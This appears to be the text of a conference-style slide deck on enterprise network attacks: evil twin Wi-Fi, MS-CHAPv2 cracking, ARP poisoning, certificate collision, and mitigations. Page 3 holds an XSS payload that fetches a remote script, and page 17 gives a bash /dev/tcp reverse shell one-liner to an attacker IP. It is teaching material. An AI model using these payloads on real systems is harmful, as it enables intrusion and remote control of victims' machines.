Breaking Bad: Enterprise Network Security

21
terprise Network Securi Navneet Kumar

Transcript of Breaking Bad: Enterprise Network Security

Page 1: Breaking Bad: Enterprise Network Security

Enterprise Network Security

Navneet Kumar

Page 2: Breaking Bad: Enterprise Network Security

Overview

• Demo• OSI Protocols Overview• Evil Twin Attack• Cryptanalysis : MS-CHAPv2• ARP poisoning• POST-MITM Attack vectors• Reverse Shell• Mitigations• Certificate Collision Attack

Note: Some Images in this presentation has been taken from web for illustration

Page 3: Breaking Bad: Enterprise Network Security

SilverFish Worm

XSS

NPAPI runtime

Shell

<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')

masterPlugin.updatePlugin(“attacker-plugin”,success,failure)

Netcat Shell / ssh daemon / Bounjour

Hatching rate = ng

n=Average # of endpoints per meetingg=# of generation

g=0

g=1

g=2

Page 4: Breaking Bad: Enterprise Network Security

802.11

ARP

Target Protocols

Attack Vectors

Page 5: Breaking Bad: Enterprise Network Security

802.11

Page 6: Breaking Bad: Enterprise Network Security

Evil twin attack

Page 7: Breaking Bad: Enterprise Network Security

Fake Certificate Exchange

Page 8: Breaking Bad: Enterprise Network Security

Soft AP

• Put WNIC in Master Mode and use Forged CA cert• Configure AP SSID to “bjn-int”• DAUTH to actual AP

Network

• Setup DNS• Setup DHCP

Routing

• Redirect 80,443 packets to proxy port• Forward traffic after NAT

Capture

• Use Same CA cert for signing• Sniff in proxy

Attack Setup

Note: Chrome uses certificate pinning for *.google.com

Page 9: Breaking Bad: Enterprise Network Security

Fake BSSID

Highest Strength2.4 GHz Channel

Wireless Scan

Page 10: Breaking Bad: Enterprise Network Security

Victim’s Client

Page 11: Breaking Bad: Enterprise Network Security

WTF !!!

Certificate Forgery

Page 12: Breaking Bad: Enterprise Network Security

Soft AP DHCP

Routing Proxy

Page 13: Breaking Bad: Enterprise Network Security

Cryptanalysis of MS-CHAPv2

ChallengeHash = SHA1(random|| username)[0:8]

ChallengeHash

ChallengeResponse

Note: Original complexity analysis has been done by Moxie Marlinspike

Page 14: Breaking Bad: Enterprise Network Security

Cryptanalysis of MS-CHAPv2

Note: Original complexity analysis has been done by Moxie Marlinspike

7 byte 7 byte 2 byte

Complexity = 256

time < 24 hrs ( 100% success )

Page 15: Breaking Bad: Enterprise Network Security

ARP poisoning

Page 16: Breaking Bad: Enterprise Network Security

POST-MITM Attack Vectors

Reverse Shell

Bind Shell

Session Hijacking

Above L3 Attacks

Page 17: Breaking Bad: Enterprise Network Security

Reverse Bind Shell

• Give a network shell to attacker• Works Behind NAT• Gets Root Access

HOW ????

$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1

Page 18: Breaking Bad: Enterprise Network Security

https://tools.google.com/service/update2

https://swdl.bluejeans.com

https://aus4.mozilla.org/update/*/update.xml

smb://MVAV01/SophosUpdate

(Auto)Updates

Depl

oy P

aylo

ad w

ith u

pdat

es

Page 19: Breaking Bad: Enterprise Network Security

Mitigation

Pre-deployment of enterprise wide CA

SSL Cert Pinning for updates

Proper WIPS Configuration

Arp Spoof Mitigations

Careful CA signing

Page 20: Breaking Bad: Enterprise Network Security

Certificate Collision Attack

CADomainA

isCA?

CSR Ekey[Sha(csr.tbs)]

DomainAisCA?

DomainAisCA?

CertificateCSR.TBS

Sha( domainA.csr ) Sha( domainB.csr )

md5( domainA.csr )

md5( domainB.csr )

True

False

MD5 CollisionCertificate Collision

Page 21: Breaking Bad: Enterprise Network Security